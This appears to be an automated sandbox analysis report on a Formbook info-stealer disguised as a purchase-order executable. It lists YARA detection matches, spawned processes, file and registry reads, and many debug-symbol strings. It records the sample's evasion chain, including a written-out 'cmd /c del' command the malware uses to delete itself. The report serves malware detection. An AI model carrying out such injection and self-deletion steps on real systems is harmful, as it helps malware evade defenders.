Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.712443613.0000000003DF9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000000.00000002.720152538.00000000052B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000007.00000002.660956521.00000000001FE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000008.00000000.661485381.000000000004E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe Binary or memory string: OriginalFilename vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000000.662706033.00000000008DE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.716188410.00000000015AF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameMFRo XBk.exe2 vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe, 00000009.00000002.716529184.0000000002F92000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewlanext.exej% vs PO45937008ADENGY.exe
Source: PO45937008ADENGY.exe Binary or memory string: OriginalFilenameDimbono.exe0 vs PO45937008ADENGY.exe
Yara signature match
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ
Source: classification engine Classification label: mal100.troj.evad.winEXE@17/5@16/13
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File created: C:\Users\user\IAHRsWbfqoM
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7024
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F6.tmp
Source: PO45937008ADENGY.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: PO45937008ADENGY.exe Virustotal: Detection: 27%
Source: PO45937008ADENGY.exe ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File read: C:\Users\user\Desktop\PO45937008ADENGY.exe:Zone.Identifier
Source: unknown Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: PO45937008ADENGY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO45937008ADENGY.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.670335958.0000000004C32000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: PO45937008ADENGY.exe, WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp, wlanext.exe
Source: Binary string: crypt32.pdb_ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb/ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb< source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rasapi32.pdb| source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb( source: WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb= source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbu source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorsecimpl.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb! source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbn source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbP source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbUGP source: PO45937008ADENGY.exe, 00000009.00000003.664621972.0000000001160000.00000004.00000001.sdmp, wlanext.exe, 00000011.00000002.915414593.0000000003A1F000.00000040.00000001.sdmp
Source: Binary string: ncrypt.pdbk source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbps; source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: imagehlp.pdby source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb_ source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: propsys.pdbm source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: iVisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.670642715.0000000000C51000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER15F6.tmp.dmp.13.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasman.pdbv source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb= source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER15F6.tmp.dmp.13.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb7 source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdbQ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wlanext.pdb source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdbs source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb+ source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cldapi.pdbC source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb; source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: edputil.pdbI source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb\F1 source: WER15F6.tmp.dmp.13.dr
Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: clrjit.pdbR source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
